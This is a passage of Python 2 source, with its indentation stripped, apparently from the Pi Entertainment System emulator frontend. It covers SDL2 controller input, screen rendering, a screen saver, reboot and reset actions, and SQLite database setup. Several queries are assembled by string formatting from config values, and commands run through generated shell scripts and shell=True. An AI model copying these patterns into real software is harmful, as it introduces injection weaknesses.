f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP, 1))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, 2))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_A, 16))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_BACK, -4))
f.write(self.getViceButtonValue(c, i, sdl2.SDL_CONTROLLER_BUTTON_GUIDE, -4))
logging.info("loading game: %s" % game.getName())
game.setPlayCount()
game.setLastPlayed()
game.save()
launchString = game.getCommand()
logging.debug("PESApp.playGame: launch string: %s" % launchString)
self.runCommand(launchString)
def processCecEvent(self, btn, dur):
if dur > 0:
logging.debug("PESApp.processCecEvent: button %s" % btn)
e = mapRemoteButtonEvent(btn)
if e:
sdl2.SDL_PushEvent(e)
def reboot(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.reboot, False)
else:
logging.info("PES is rebooting...")
self.runCommand(self.config.rebootCommand)
def reload(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.reload, False)
else:
logging.info("PES is reloading...")
self.runCommand("sleep 1")
def resetConfig(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.resetConfig, False)
else:
logging.info("PES is resetting its config...")
for root, dirs, files in os.walk(userConfDir, topdown=False):
for name in files:
path = os.path.join(root, name)
logging.debug("PESApp.resetConfig: deleting file %s" % path)
os.remove(path)
for name in dirs:
path = os.path.join(root, name)
logging.debug("PESApp.resetConfig: deleting directory %s" % path)
os.rmdir(path)
self.runCommand("sleep 1")
def resetDatabase(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.resetDatabase, False)
else:
logging.info("PES is resetting its database...")
logging.debug("PESApp.resetDatabase: deleting %s" % userPesDb)
os.remove(userPesDb)
self.runCommand("sleep 1")
def run(self):
if sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO | sdl2.SDL_INIT_JOYSTICK | sdl2.SDL_INIT_GAMECONTROLLER) != 0:
pesExit("Failed to inialise SDL!", True)
sdl2.SDL_ShowCursor(0)
sdl2.sdlttf.TTF_Init()
imgFlags = sdl2.sdlimage.IMG_INIT_JPG | sdl2.sdlimage.IMG_INIT_PNG
initted = sdl2.sdlimage.IMG_Init(imgFlags)
if initted != imgFlags:
pesExit("Failed to inialise SDL_Image!", True)
videoMode = sdl2.video.SDL_DisplayMode()
if sdl2.video.SDL_GetDesktopDisplayMode(0, videoMode) != 0:
pesExit("PESApp.run: unable to get current video mode!")
logging.debug("PESApp.run: video mode (%d, %d), refresh rate: %dHz" % (videoMode.w, videoMode.h, videoMode.refresh_rate))
self.__screenSize = (videoMode.w, videoMode.h)
logging.debug("Using PySDL2 %s" % sdl2.__version__)
sdl2Version = sdl2.SDL_version()
sdl2.SDL_GetVersion(sdl2Version)
logging.debug("Using SDL2 %s.%s.%s" % (sdl2Version.major, sdl2Version.minor, sdl2Version.patch))
# register PES event type
if pes.event.registerPesEventType():
logging.debug("PESApp.run: PES event type registered in SDL2: %s" % pes.event.EVENT_TYPE)
else:
logging.error("PESApp.run: could not register PES event type in SDL2!")
self.exit(1)
setLogicalSize = False
if self.__dimensions[0] == 0 or self.__dimensions == 0:
# assume full screen
logging.debug("PESApp.run: running fullscreen")
if videoMode.w > self.config.desiredResolution[0] and videoMode.h > self.config.desiredResolution[1]:
self.__dimensions = (self.config.desiredResolution[0], self.config.desiredResolution[1])
setLogicalSize = True
else:
self.__dimensions = (videoMode.w, videoMode.h)
self.__window = sdl2.video.SDL_CreateWindow('PES', sdl2.video.SDL_WINDOWPOS_UNDEFINED, sdl2.video.SDL_WINDOWPOS_UNDEFINED, self.__dimensions[0], self.__dimensions[1], sdl2.video.SDL_WINDOW_FULLSCREEN_DESKTOP)
else:
# windowed
logging.debug("PESApp.run: running windowed")
self.__window = sdl2.video.SDL_CreateWindow('PES', sdl2.video.SDL_WINDOWPOS_UNDEFINED, sdl2.video.SDL_WINDOWPOS_UNDEFINED, self.__dimensions[0], self.__dimensions[1], 0)
self.menuHeight = self.__dimensions[1] - self.__footerHeight - self.__headerHeight
self.menuRect = [0, self.__headerHeight + 1, self.menuWidth, self.__dimensions[1] - self.__headerHeight + 1]
self.screenRect = [self.menuWidth + 1, self.__headerHeight + 1, self.__dimensions[0] - self.menuWidth + 1, self.__dimensions[1] - self.__headerHeight + 1]
logging.debug("PESApp.run: window dimensions: (%d, %d)" % (self.__dimensions[0], self.__dimensions[1]))
self.splashFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['splash'])
self.menuFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['menu'])
self.headerFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['header'])
self.titleFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['title'])
self.bodyFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['body'])
self.smallBodyFont = sdl2.sdlttf.TTF_OpenFont(self.config.fontFile, self.__fontSizes['smallBody'])
self.renderer = sdl2.SDL_CreateRenderer(self.__window, -1, sdl2.render.SDL_RENDERER_ACCELERATED)
if setLogicalSize:
logging.debug("PESApp.run: setting logical resolution to: (%d, %d)" % (self.__dimensions[0], self.__dimensions[1]))
sdl2.SDL_RenderSetLogicalSize(self.renderer, self.__dimensions[0], self.__dimensions[1])
# pre-initialise screens
self.screens = {}
headerLabel = Label(self.renderer, 5, 0, "Pi Entertainment System", self.headerFont, self.textColour)
self.__uiObjects.append(headerLabel)
dateLabel = Label(self.renderer, 0, 0, "00:00:00 00/00/0000", self.headerFont, self.textColour)
dateLabel.x = self.__dimensions[0] - dateLabel.width - 5
self.__uiObjects.append(dateLabel)
splashLabel = Label(self.renderer, 0, 0, "Pi Entertainment System", self.splashFont, self.textColour)
splashLabel.x = int((self.__dimensions[0] - splashLabel.width) / 2)
splashLabel.y = ((self.__dimensions[1]) / 2) - splashLabel.height
running = True
loading = True
lastTick = sdl2.timer.SDL_GetTicks()
splashTextureAlpha = 25
progressBarWidth = splashLabel.width
progressBarHeight = 40
progressBarX = splashLabel.x
progressBarY = splashLabel.y + splashLabel.height + 20
loadingThread = PESLoadingThread(self)
progressBar = ProgressBar(self.renderer, progressBarX, progressBarY, progressBarWidth, progressBarHeight, self.lineColour, self.menuBackgroundColour)
statusLabel = Label(self.renderer, 0, 0, loadingThread.status, self.bodyFont, self.textColour)
statusLabel.x = int((self.__dimensions[0] - statusLabel.width) / 2)
statusLabel.y = progressBarY + progressBarHeight + 2
# load joystick database
sdl2.SDL_GameControllerAddMappingsFromFile(userGameControllerFile)
self.__gamepadIcon = Icon(self.renderer, dateLabel.x, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, gamepadImageFile, False)
self.__gamepadIcon.setVisible(False)
self.__remoteIcon = Icon(self.renderer, dateLabel.x, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, remoteImageFile, False)
self.__remoteIcon.setVisible(self.__cecEnabled)
self.__networkIcon = Icon(self.renderer, dateLabel.x - 42, dateLabel.y, self.__ICON_WIDTH, self.__ICON_HEIGHT, networkImageFile, False)
self.ip = None
defaultInterface = getDefaultInterface()
if defaultInterface:
self.ip = getIPAddress(defaultInterface)
logging.debug("PESApp.run: default interface: %s, IP address: %s" % (defaultInterface, self.ip))
else:
logging.warning("PESApp.run: default network interface not found!")
self.__networkIcon.setVisible(False)
self.__msgBox = None
self.__controlPad = None
self.__controlPadIndex = None
self.__dpadAsAxis = False
joystickTick = sdl2.timer.SDL_GetTicks()
downTick = joystickTick
screenSaverTick = joystickTick
screenSaverActive = False
self.__screenSaverLabel = None
fpsManager = sdl2.sdlgfx.FPSManager()
sdl2.sdlgfx.SDL_initFramerate(fpsManager)
sdl2.sdlgfx.SDL_setFramerate(fpsManager, 60)
while running:
if self.__screenSaverTimeout > 0 and not screenSaverActive and sdl2.timer.SDL_GetTicks() - screenSaverTick > self.__screenSaverTimeout * 60000: # milliseconds per minute
logging.debug("PESApp.run: activating screen saver")
screenSaverActive = True
screenSaverLastTick = screenSaverTick
if self.__screenSaverLabel == None:
self.__screenSaverLabel = Label(self.renderer, 0, 0, "Pi Entertainment System", self.splashFont, self.textColour)
self.__screenSaverLabel.setCoords(random.randint(0, self.__dimensions[0] - self.__screenSaverLabel.width), random.randint(0, self.__dimensions[1] - self.__screenSaverLabel.height))
events = sdl2.ext.get_events()
for event in events:
if self.doJsToKeyEvents:
if (event.type == sdl2.SDL_CONTROLLERBUTTONDOWN or event.type == sdl2.SDL_CONTROLLERBUTTONUP) and self.__controlPad and event.cbutton.which == self.__controlPadIndex and (not self.__dpadAsAxis or (self.__dpadAsAxis and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT and event.cbutton.button != sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT)):
if event.type == sdl2.SDL_CONTROLLERBUTTONDOWN:
logging.debug("PESApp.run: player 1 button \"%s\" pressed" % sdl2.SDL_GameControllerGetStringForButton(event.cbutton.button))
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
e = mapControlPadButtonEvent(event, sdl2.SDL_KEYDOWN)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_CONTROLLERBUTTONUP:
e = mapControlPadButtonEvent(event, sdl2.SDL_KEYUP)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_CONTROLLERAXISMOTION and self.__controlPad and event.cbutton.which == self.__controlPadIndex:
if event.caxis.value < JOYSTICK_AXIS_MIN or event.caxis.value > JOYSTICK_AXIS_MAX:
logging.debug("PESApp.run: player 1 axis \"%s\" activated: %d" % (sdl2.SDL_GameControllerGetStringForAxis(event.caxis.axis), event.caxis.value))
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
e = mapControlPadAxisEvent(event, sdl2.SDL_KEYDOWN)
if e:
sdl2.SDL_PushEvent(e)
else:
e = mapControlPadAxisEvent(event, sdl2.SDL_KEYUP)
if e:
sdl2.SDL_PushEvent(e)
elif event.type == sdl2.SDL_JOYAXISMOTION and self.__controlPad and self.__controlPadIndex == event.jaxis.which:
if self.__dpadAsAxis:
# and so begins some really horrible code to work around the SDL2 game controller API mapping axis to dpad buttons
for b in [sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, sdl2.SDL_CONTROLLER_BUTTON_DPAD_RIGHT]:
bind = sdl2.SDL_GameControllerGetBindForButton(c, b)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
if bind.value.axis == event.jaxis.axis:
btn = b
if event.jaxis.value < JOYSTICK_AXIS_MIN:
if b == sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP
else:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_LEFT
key = mapButtonToKey(btn)
if event.jaxis.value < JOYSTICK_AXIS_MIN or event.jaxis.value > JOYSTICK_AXIS_MAX:
downTick = sdl2.timer.SDL_GetTicks() + (self.__CONTROL_PAD_BUTTON_REPEAT * 2)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
else:
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYUP
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
break
if event.type == pes.event.EVENT_TYPE:
(t, d1, d2) = pes.event.decodePesEvent(event)
logging.debug("PESApp.run: trapping PES Event")
if not loading and t == pes.event.EVENT_DB_UPDATE:
self.initSurfaces(True) # calls refresh method of all consoles
for c in self.consoles:
screenName = "Console %s" % c.getName()
if c.getGameTotal() > 0:
if screenName in self.screens:
self.screens[screenName].refresh()
else:
logging.debug("PESApp.run adding ConsoleScreen for %s following database update" % c.getName())
self.screens[screenName] = ConsoleScreen(self, self.renderer, self.menuRect, self.screenRect, c)
self.screens["Home"].refreshMenu()
Thumbnail.destroyTextures()
if screenSaverActive:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
elif not loading and t == pes.event.EVENT_ACHIEVEMENTS_UPDATE:
logging.debug("PESApp.run: achievements have been updated")
self.setUpRetroAchievementUser()
self.screens["Home"].updateRecentBadges()
#elif t == pes.event.EVENT_RESOURCES_LOADED:
# pass
if screenSaverActive:
if event.type == sdl2.SDL_KEYDOWN:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
else:
if not loading:
# keyboard events
if event.type == sdl2.SDL_KEYDOWN:
screenSaverTick = sdl2.timer.SDL_GetTicks()
if event.key.keysym.sym == sdl2.SDLK_BACKSPACE:
logging.debug("PESApp.run: trapping backspace key event")
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.setVisible(False)
if self.screens[self.screenStack[-1]].menuActive:
# pop the screen
screenStackLen = len(self.screenStack)
logging.debug("PESApp.run: popping screen stack, current length: %d" % screenStackLen)
if screenStackLen > 1:
self.screenStack.pop()
self.setScreen(self.screenStack[-1], False)
else:
self.screens[self.screenStack[-1]].setMenuActive(True)
elif event.key.keysym.sym == sdl2.SDLK_HOME:
logging.debug("PESApp.run: trapping home key event")
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.setVisible(False)
# pop all screens and return home
if not self.screens[self.screenStack[-1]].isBusy():
while len(self.screenStack) > 1:
s = self.screenStack.pop()
self.screens[s].setMenuActive(False)
self.screens[s].processEvent(event)
self.setScreen("Home", False)
self.screens["Home"].setMenuActive(True)
self.screens["Home"].menu.setSelected(0)
self.screens["Home"].update()
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.processEvent(event)
else:
self.screens[self.screenStack[-1]].processEvent(event)
elif event.type == sdl2.SDL_KEYUP or event.type == sdl2.SDL_JOYBUTTONUP or event.type == sdl2.SDL_JOYAXISMOTION or event.type == sdl2.SDL_JOYHATMOTION:
self.screens[self.screenStack[-1]].processEvent(event)
if event.type == sdl2.SDL_KEYDOWN and event.key.keysym.sym == sdl2.SDLK_ESCAPE:
logging.debug("PESApp.run: trapping escape key event")
self.exit(confirm=True)
# joystick events
if event.type == sdl2.SDL_QUIT:
running = False
break
if loading:
sdl2.SDL_SetRenderDrawColor(self.renderer, self.backgroundColour.r, self.backgroundColour.g, self.backgroundColour.b, 255)
sdl2.SDL_RenderClear(self.renderer)
if not loadingThread.started:
loadingThread.start()
joystickTick = sdl2.timer.SDL_GetTicks()
if splashTextureAlpha < 255 and joystickTick - lastTick > 100:
splashTextureAlpha += 25
if splashTextureAlpha > 255:
splashTextureAlpha = 255
lastTick = joystickTick
splashLabel.setAlpha(splashTextureAlpha)
splashLabel.draw()
if loadingThread.done and splashTextureAlpha >= 255:
loading = False
splashLabel.destroy()
statusLabel.destroy()
self.screens["Home"].loadTextures()
else:
progressBar.setProgress(loadingThread.progress)
progressBar.draw()
if statusLabel.setText(loadingThread.status):
statusLabel.x = int((self.__dimensions[0] - statusLabel.width) / 2)
statusLabel.draw()
elif screenSaverActive:
sdl2.SDL_SetRenderDrawColor(self.renderer, 0, 0, 0, 255)
sdl2.SDL_RenderClear(self.renderer)
# x, y, text, font, colour, bgColour=None, fixedWidth=0, fixedHeight=0, autoScroll=False, bgAlpha=255
if sdl2.SDL_GetTicks() - screenSaverLastTick > 10000: # move label every 10s
logging.debug("PESApp.run: moving screen saver label")
screenSaverLastTick = sdl2.SDL_GetTicks()
self.__screenSaverLabel.setCoords(random.randint(0, self.__dimensions[0] - self.__screenSaverLabel.width), random.randint(0, self.__dimensions[1] - self.__screenSaverLabel.height))
self.__screenSaverLabel.draw()
else:
sdl2.SDL_SetRenderDrawColor(self.renderer, self.backgroundColour.r, self.backgroundColour.g, self.backgroundColour.b, 255)
sdl2.SDL_RenderClear(self.renderer)
sdl2.sdlgfx.boxRGBA(self.renderer, 0, 0, self.__dimensions[0], self.__headerHeight, self.headerBackgroundColour.r, self.headerBackgroundColour.g, self.headerBackgroundColour.b, 255) # header bg
headerLabel.draw()
self.screens[self.screenStack[-1]].draw()
now = datetime.now()
dateLabel.setText(now.strftime("%H:%M:%S %d/%m/%Y"))
dateLabel.draw()
iconX = dateLabel.x - 42
if self.__networkIcon.visible:
self.__networkIcon.x = iconX
self.__networkIcon.draw()
iconX -= 37
if self.__gamepadIcon.visible:
self.__gamepadIcon.x = iconX
self.__gamepadIcon.draw()
iconX -= 37
if self.__remoteIcon.visible:
self.__remoteIcon.x = iconX
self.__remoteIcon.draw()
sdl2.sdlgfx.rectangleRGBA(self.renderer, 0, self.__headerHeight, self.__dimensions[0], self.__headerHeight, self.lineColour.r, self.lineColour.g, self.lineColour.b, 255) # header line
if not loading:
# detect joysticks
if self.__controlPad and not sdl2.SDL_GameControllerGetAttached(self.__controlPad):
logging.debug("PESApp.run: player 1 control pad no longer attached!")
sdl2.SDL_GameControllerClose(self.__controlPad)
self.__controlPad = None
self.__controlPadIndex = None
self.__gamepadIcon.setVisible(False)
elif self.doJsToKeyEvents:
# is the user holding down a button?
# note: we only care about directional buttons
if self.__dpadAsAxis:
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN)
if bind and bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
js = sdl2.SDL_GameControllerGetJoystick(self.__controlPad)
axisValue = sdl2.SDL_JoystickGetAxis(js, bind.value.axis)
if axisValue < JOYSTICK_AXIS_MIN or axisValue > JOYSTICK_AXIS_MAX:
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN
if axisValue < JOYSTICK_AXIS_MIN:
btn = sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP
key = mapButtonToKey(btn)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
else:
for b in [sdl2.SDL_CONTROLLER_BUTTON_DPAD_DOWN, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP]:
if sdl2.SDL_GameControllerGetButton(self.__controlPad, b):
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
key = mapButtonToKey(b)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
# is the user holding down an axis?
# note: at the moment we only care about the left axis in the Y plane
for a in [sdl2.SDL_CONTROLLER_AXIS_LEFTY]:
value = sdl2.SDL_GameControllerGetAxis(self.__controlPad, a)
if value < JOYSTICK_AXIS_MIN or value > JOYSTICK_AXIS_MAX:
if sdl2.timer.SDL_GetTicks() - downTick > self.__CONTROL_PAD_BUTTON_REPEAT:
downTick = sdl2.timer.SDL_GetTicks()
key = mapAxisToKey(a, value)
if key:
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = key
sdl2.SDL_PushEvent(e)
if sdl2.timer.SDL_GetTicks() - joystickTick > 1000:
tick = sdl2.timer.SDL_GetTicks()
joystickTotal = sdl2.joystick.SDL_NumJoysticks()
if joystickTotal > 0:
#logging.debug("PESApp.run: found %d control pads" % joystickTotal)
for i in xrange(joystickTotal):
if sdl2.SDL_IsGameController(i):
close = True
c = sdl2.SDL_GameControllerOpen(i)
if sdl2.SDL_GameControllerGetAttached(c):
#logging.debug("PESApp.run: %s is attached at %d" % (sdl2.SDL_GameControllerNameForIndex(i), i))
if self.__controlPad == None:
logging.debug("PESApp.run: switching player 1 to control pad #%d: %s (%s)" % (i, sdl2.SDL_GameControllerNameForIndex(i), getJoystickGUIDString(sdl2.SDL_JoystickGetDeviceGUID(i))))
self.__controlPadIndex = i
self.__controlPad = c
self.updateControlPad(self.__controlPadIndex)
close = False
self.__gamepadIcon.setVisible(True)
if screenSaverActive:
screenSaverActive = False
screenSaverTick = sdl2.timer.SDL_GetTicks()
#print sdl2.SDL_GameControllerMapping(c)
if close:
sdl2.SDL_GameControllerClose(c)
if self.__msgBox and self.__msgBox.isVisible():
self.__msgBox.draw()
sdl2.SDL_RenderPresent(self.renderer)
# limit frame rate
sdl2.sdlgfx.SDL_framerateDelay(fpsManager)
self.exit(0)
def runCommand(self, command):
logging.debug("PESApp.runCommand: about to write to: %s" % scriptFile)
logging.debug("PESApp.runCommand: command: %s" % command)
execLog = os.path.join(userLogDir, "exec.log")
with open(scriptFile, 'w') as f:
f.write("echo running %s\n" % command)
f.write("echo see %s for console output\n" % execLog)
f.write("%s &> %s\n" % (command, execLog))
f.write("exec %s %s\n" % (os.path.join(baseDir, 'bin', 'pes') , ' '.join(sys.argv[1:])))
self.exit(0)
def runKodi(self):
logging.debug("PESApp.runKodi: launching kodi using: %s" % self.config.kodiCommand)
self.runCommand(self.config.kodiCommand)
def setCecEnabled(self, enabled):
self.__cecEnabled = enabled
def setScreen(self, screen, doAppend=True):
if not screen in self.screens:
logging.warning("PESApp.setScreen: invalid screen selection \"%s\"" % screen)
else:
logging.debug("PESApp.setScreen: setting current screen to \"%s\"" % screen)
logging.debug("PESApp.setScreen: adding screen \"%s\" to screen stack" % screen)
if doAppend:
self.screenStack.append(screen)
self.screens[screen].setMenuActive(True)
def setUpRetroAchievementUser(self):
if self.retroAchievementConn:
if self.achievementUser:
logging.debug("PESApp.setUpRetroAchievementUser: refreshing user object...")
self.achievementUser.refresh()
else:
logging.debug("PESApp.setUpRetroAchievementUser: setting up user object...")
# look up user in database
con = None
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute("SELECT `user_id` FROM `achievements_user` WHERE `user_name` = '%s';" % self.retroAchievementConn.getUsername().replace("'", "''"))
row = cur.fetchone()
if row:
self.achievementUser = AchievementUser(userPesDb, row['user_id'])
except sqlite3.Error, e:
logging.error(e)
if con:
con.rollback()
self.__endTime = time.time()
self.__success = False
return
finally:
if con:
con.close()
def showMessageBox(self, text, callback, *callbackArgs):
if self.__msgBox:
self.__msgBox.destroy()
self.__msgBox = MessageBox(self.renderer, text, self.bodyFont, self.textColour, self.menuBackgroundColour, self.lineColour, callback, *callbackArgs)
self.__msgBox.setVisible(True)
def shutdown(self, confirm=True):
if confirm:
self.showMessageBox("Are you sure?", self.shutdown, False)
else:
logging.info("PES is shutting down...")
self.runCommand(self.config.shutdownCommand)
def updateControlPad(self, jsIndex):
if jsIndex == self.__controlPadIndex:
# hack for instances where a dpad is an axis
bind = sdl2.SDL_GameControllerGetBindForButton(self.__controlPad, sdl2.SDL_CONTROLLER_BUTTON_DPAD_UP)
if bind:
if bind.bindType == sdl2.SDL_CONTROLLER_BINDTYPE_AXIS:
self.__dpadAsAxis = True
logging.debug("PESApp.run: enabling dpad as axis hack")
else:
self.__dpadAsAxis = False
class PESLoadingThread(threading.Thread):
def __init__(self, app):
super(PESLoadingThread, self).__init__()
self.app = app
self.progress = 0
self.started = False
self.done = False
self.status = "Initialising"
def run(self):
self.started = True
# create database (if needed)
con = None
logging.debug('PESLoadingThread.run: connecting to database: %s' % userPesDb)
try:
self.status = "Checking database..."
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS `games`(`game_id` INTEGER PRIMARY KEY, `thegamesdb_id` INT, `exists` INT, `console_id` INT, `name` TEXT, `cover_art` TEXT, `game_path` TEXT, `overview` TEXT, `released` INT, `last_played` INT, `added` INT, `favourite` INT(1), `play_count` INT, `size` INT, `rasum` TEXT, `achievement_api_id` INT )')
cur.execute('CREATE INDEX IF NOT EXISTS "games_index" on games (game_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `consoles`(`console_id` INTEGER PRIMARY KEY, `thegamesdb_api_id` INT, `achievement_api_id` INT, `name` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_index" on consoles (console_id ASC)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_achievement_index" on consoles (achievement_api_id ASC)')
cur.execute('CREATE INDEX IF NOT EXISTS "console_thegamesdb_index" on consoles (thegamesdb_api_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `games_catalogue` (`short_name` TEXT, `full_name` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "games_catalogue_index" on games_catalogue (short_name ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_user`(`user_id` INTEGER PRIMARY KEY, `user_name` TEXT, `rank` INT, `total_points` INT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_user_index" on achievements_user (user_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_games`(`game_id` INTEGER PRIMARY KEY, `console_id` INT, `achievement_total` INT, `score_total` INT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_game_index" on achievements_games (game_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_badges`(`badge_id` INTEGER PRIMARY KEY, `title` TEXT, `game_id` INT, `description` TEXT, `points` INT, `badge_path` TEXT, `badge_locked_path` TEXT)')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_badge_index" on achievements_badges (badge_id ASC)')
cur.execute('CREATE TABLE IF NOT EXISTS `achievements_earned`(`user_id` INT, `badge_id` INT, `date_earned` INT, `date_earned_hardcore` INT, PRIMARY KEY (user_id, badge_id))')
cur.execute('CREATE INDEX IF NOT EXISTS "achievements_earned_index" on achievements_earned (user_id ASC, badge_id ASC)')
self.progress = 16
# is the games catalogue populated?
cur.execute('SELECT COUNT(*) AS `total` FROM `games_catalogue`')
row = cur.fetchone()
if row['total'] == 0:
self.status = "Populating games catalogue..."
logging.info("PESLoadingThread.run: populating games catalogue using file: %s" % userGamesCatalogueFile)
catalogueConfigParser = ConfigParser.ConfigParser()
catalogueConfigParser.read(userGamesCatalogueFile)
sections = catalogueConfigParser.sections()
sectionTotal = float(len(sections))
i = 0.0
insertValues = []
for section in sections:
if catalogueConfigParser.has_option(section, 'full_name'):
fullName = catalogueConfigParser.get(section, 'full_name')
#logging.debug("PESLoadingThread.run: inserting game into catalogue: %s -> %s" % (section, fullName))
#cur.execute('INSERT INTO `games_catalogue` (`short_name`, `full_name`) VALUES ("%s", "%s");' % (section, fullName))
insertValues.append('("%s", "%s")' % (section, fullName))
else:
logging.error("PESLoadingThread.run: games catalogue section \"%s\" has no \"full_name\" option!" % section)
i += 1.0
self.progress = 16 + (16 * (i / sectionTotal))
if len(insertValues) > 0:
cur.execute('INSERT INTO `games_catalogue` (`short_name`, `full_name`) VALUES %s;' % ','.join(insertValues))
con.commit()
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
self.progress = 32
self.status = "Loading consoles..."
# load consoles
configParser = ConfigParser.ConfigParser()
configParser.read(userConsolesConfigFile)
supportedConsoles = configParser.sections()
supportedConsoleTotal = float(len(supportedConsoles))
supportedConsoles.sort()
i = 0
for c in supportedConsoles:
# check the console definition from the config file
try:
consolePath = self.app.config.romsDir + os.sep + c
mkdir(consolePath)
consoleCoverartDir = self.app.config.coverartDir + os.sep + c
mkdir(consoleCoverartDir)
extensions = configParser.get(c, 'extensions').split(' ')
command = configParser.get(c, 'command').replace('%%BASE%%', baseDir)
consoleImg = configParser.get(c, 'image').replace('%%BASE%%', baseDir)
emulator = configParser.get(c, 'emulator')
checkFile(consoleImg)
nocoverart = configParser.get(c, 'nocoverart').replace('%%BASE%%', baseDir)
checkFile(nocoverart)
thegamesdbApiId = configParser.getint(c, 'thegamesdb_id')
consoleId = None
# have we already saved this console to the database?
try:
con = sqlite3.connect(userPesDb)
con.row_factory = sqlite3.Row
cur = con.cursor()
cur.execute('SELECT `console_id` FROM `consoles` WHERE `name` = "%s";' % c)
row = cur.fetchone()
if row:
consoleId = int(row['console_id'])
except sqlite3.Error, e:
pesExit("Error: %s" % e.args[0], True)
finally:
if con:
con.close()
console = Console(c, consoleId, thegamesdbApiId, extensions, consolePath, command, userPesDb, consoleImg, nocoverart, consoleCoverartDir, emulator)
if configParser.has_option(c, 'ignore_roms'):
for r in configParser.get(c, 'ignore_roms').split(','):
console.addIgnoreRom(r.strip())
if configParser.has_option(c, 'achievement_id'):
console.setAchievementApiId(configParser.get(c, 'achievement_id'))
if configParser.has_option(c, 'require'):
for f in configParser.get(c, 'require').split(','):
console.addRequiredFile(f.strip().replace('%%USERBIOSDIR%%', self.app.config.biosDir))
if console.isNew():
console.save()
self.app.consoles.append(console)
i += 1
self.progress = 32 + (16 * (i / supportedConsoleTotal))
except ConfigParser.NoOptionError as e:
logging.error('PESLoadingThread.run: error parsing config file %s: %s' % (userConsolesConfigFile, e.message))
self.done = True
self.app.exit(1)
return
except ValueError as e:
logging.error('PESLoadingThread.run: error parsing config file %s: %s' % (userConsolesConfigFile, e.message))
self.done = True
self.app.exit(1)
return
self.progress = 48
self.status = "Loading timezone info..."
process = Popen(self.app.config.listTimezonesCommand, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = process.communicate()
if process.returncode != 0:
logging.error("PESLoadingThread.run: could not get time zones")
logging.error(stderr)
else:
for l in stdout.split("\n")[:-1]:
self.app.timezones.append(l)
